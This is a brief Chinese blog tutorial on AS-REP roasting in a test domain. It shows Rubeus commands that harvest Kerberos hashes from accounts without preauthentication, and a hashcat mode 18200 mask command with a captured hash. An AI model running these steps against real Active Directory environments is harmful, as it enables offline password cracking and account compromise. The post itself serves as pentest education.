As-repoasting爆破

最新推荐文章于 2024-05-14 16:10:34 发布
最新推荐文章于 2024-05-14 16:10:34 发布
阅读量319 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/106532404
版权
这个功能会通过LDAP查询域内用户设置了选项”Do not require Kerberos preauthentication”,然后发AS_REQ的包,直接生成hash或者john可破解的格式


我们先设置一个用户不需要预验证
在这里插入图片描述
然后直接使用Rubeus来寻找可以利用的用户~~
执行的命令为:

Rubeus.exe asreproast

在这里插入图片描述这样我们直接用hashcat爆破密码就行了
这儿默认返回的是hash格式的,若想要返回john格式的
执行命令

Rubeus.exe asreproast /format:john

我这儿用hashcat的掩码模式来爆破

hashcat64.exe -a 3 -m 18200 $krb5asrep$23$test1@test.com:01EF9F8A158B0639063FFB1CAD887C4F$BAE81E3FB47820582AF6ECB854C69539FF6FCEBBBC37ED7952FFAD752A8D23E457BD44BF9F12AA447DF9C16D820C96372D51982C8FA7B4113EAA3F462877E2E04A9F13F5CC1F0FF05CF6455927B3587CC10E4BC56608E9A0CF08E4F13537520A4EDEAF4F03F3B9E9451D368DB7219B29D23F440C4D1E4816C983AED9AA35B068B049216A50B0267A3EA69DD97C70712CF3C4A375D55E7C9AEB693DA167C7BA93F86849323B542E43558F4C8F64A64D85B54C4A87A7360FDC65EA5EE443AFDBF7F86F604FBD2B0A8523E92F6C830B1B56F7FB1EBFA3D07CD89E5F68D20FF69E80022E2757 -1 qwe!@#123456789 --increment --increment-min 9 --increment-max 9 ?1?1?1?1?1?1?1?1?1

在这里插入图片描述更多hashcat -m请参考链接

HyyMbb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
域渗透技术解析:Roasting AS-REP
systemino的博客
07-02 959
去年11月,我发表了一篇名为"没有 Mimikatz 的 Kerberoast 攻击利用"的文章,详细介绍了PowerView和Tim Medin提出的Kerberoasting 攻击的最新研究进展。这使我开始更仔细地研究 Kerberos。 几周前,我的同事Lee Christensen发现Exumbra Operations的Geoff Janjua做了一个有趣的演讲,题为"武器化 Kerbe...
BUUCTF misc 专题(119)hashcat
tt_npc的博客
08-25 870
BUUCTF misc 专题(119)hashcat
BUUCTF-Crypto 刷题记录1-1
orchid_sea的博客
05-14 1049
下面是一个大整数:98554799767,请分解为两个素数,分解后,小的放前面,大的放后面,合成一个新的数字,进行md5的32位小写哈希,提交答案。根据RSA算法,n=pq,phi=(p-1)(q-1),d是e关于phi的逆元,解密m=(c^d) mod n。注意:得到的 flag 请 将 noxCTF 替换为 flag ,格式为 flag{} 提交。RSA加密中,n=pq,phin=(p-1)(q-1),d=inverse(e,phin)推测为栅栏密码,根据f l a g的位置,推测为两个字符一组。
BUUCTF:hashcat
末初的CSDN博客
11-19 2146
https://buuoj.cn/challenges#hashcat XML文件,添加文件后缀为ppt,有加密 使用Accent OFFICE Password Recovery对其爆破密码,老样子还是猜测密码为四位纯数字 Accent OFFICE Password Recovery下载地址:https://www.52pojie.cn/thread-82569-1-1.html 得到密码为:9919 或者使用office2john.py和john也可爆破密码 office2john.p
身份集权设施保护之Kerberos协议
ZAWX_NETSTARSEC的博客
05-30 873
Kerberosting需要选择简单的key,在三种爆破对象中,也就是用户账户,机器账户,服务账户,在比较安全的域中用户账户的安全性会比较高,而机器账户密码是随机生成的,而且三十天更换一次,只有服务账户会出现弱口令的情况,因为在服务部署的时候往往会产生一个固定密码,而且可能从来不去改,所以优先选择服务账户,机器账户也是特殊的服务账户,因为它也有SPN,SPN是唯一标识符,就像下图中的格式,可以理解为代表了特定的服务,SPN只要符合格式,不管服务存不存在都可以用来进行密码爆破。而该属性默认是没有勾选上的。
buuctf MISC - hashcat
c868954104的博客
11-24 297
发现是2010版本的office文件,使用hashcat爆破。使用010查看发现是一个office文件。使用office2john导出hash。将hash文件修改一下去掉前面的文件名。将后缀修改为ppt打开时发现需要密码。打开ppt在第7页发现有隐藏的文字。修改为红色得到flag。
AdvancedRARPassword-rar爆破.zip
05-03
"AdvancedRARPassword-rar爆破.zip"这个压缩包文件涉及到的是RAR文件的密码恢复技术,主要针对那些忘记了密码或者需要访问受保护的RAR档案的场景。RAR是一种流行的文件压缩格式,由WinRAR软件创建和管理,它提供了...
AccentRarPasswordRecovery-rar爆破.zip
05-03
AccentRarPasswordRecovery-rar爆破.zip
AdvancedArchivePasswordRecovery-明文爆破.zip
05-03
AdvancedArchivePasswordRecovery-明文爆破.zip
Ziperello-zip爆破.zip
05-03
Ziperello-zip爆破.zip
7-FTP爆破.zip
08-11
FTP爆破工具有很多,如Hydra、Ncrack等,它们可以快速地进行大量组合尝试,以突破FTP服务器的登录验证。 在使用这个压缩包中的FTP爆破工具时,首先需要准备一个用户名字典username.dic,列出所有可能的用户名,包括...
hashcat的一点密码破解的心得(转载)
03-04
hashcat的命令行详解,真正高手必备。
域渗透-AS-REP Roasting攻击
good good study
03-25 1376
AS-REP Roasting是一种对域用户账号hash进行离线爆破的攻击方式。但是该攻击方式利用比较局限,因为其需要用户账号设置 "Do not require Kerberos preauthentication(不需要kerberos预身份验证) "。而该属性默认是没有勾选上的。预身份验证是Kerberos身份验证的第一步(AS_REQ & AS_REP),它的主要作用是防止密码脱机爆破。默认情况下,预身份验证是开启的,KDC会记录密码错误次数,防止在线爆破
AS-REP Roasting攻击
谢公子的博客
03-29 2322
首先,关闭hack2用户的 Kerberos预身份验证。 然后使用 Rubeus执行如下命令 Rubeus.exe asreproast 然后使用hashcat进行爆破
红队技巧-域渗透的协议利用
Gamma_lab的博客
06-29 2364
1.pth(hash传递) 1.1 PTH简介 哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统,攻击者无须通过解密hash值来获取明文密码,因为对于每个Session hash值都是固定的,除非密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击,攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。 1.2 PTH限制 在03之后有了uac,所以本地只有sid 为500和admi
BUU-MISC-hashcat
qq_24033605的博客
06-02 390
标题问是什么文件格式,16进制看文件头没看出来,binwalk分析一下是xml文件,修改后缀为ppt。 结果ppt是加密的。使用Accent OFFICE Password Recovery进行解密。 密码是9919 打开后第7页和其他页面不一样,全选修改颜色即可看到flag。 ...
BUUCTF-Misc-No.4
pone2233的博客
05-16 3437
文章目录比赛信息内心os(蛮重要的)被偷走的文件 | SOLVED |[GXYCTF2019]佛系青年 | SOLVED |秘密文件 | SOLVED |[BJDCTF 2nd]TARGZ-y1ng | SOLVED |[BJDCTF2020]认真你就输了 | SOLVED |[BJDCTF2020]just_a_rar | SOLVED |[BJDCTF2020]你猜我是个啥 | SOLVED |寂静之城 | SOLVED |间谍启示录 | SOLVED |[GXYCTF2019]gakki | SOLV
网络安全从入门到精通(第十章-5) Bypass - 绕过Waf(上)
划水的小白白
02-27 911
本文内容: ~什么是bypass ~Waf检测机制 ~常见绕Waf手法 ~建议 每日一次: 一定要在合法的情况下进行渗透测试,不要越界!!!
ANSYS/LS-DYNA 爆破教學
最新发布
06-29
对于爆破教学,它可以帮助用户模拟实际爆破过程中的物理现象,如岩石破碎、应力波传播以及碎片运动等。 在使用LS-DYNA进行爆破教学时,通常涉及以下步骤: 1. **模型建立**:首先,你需要建立一个详细的模型,包括...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值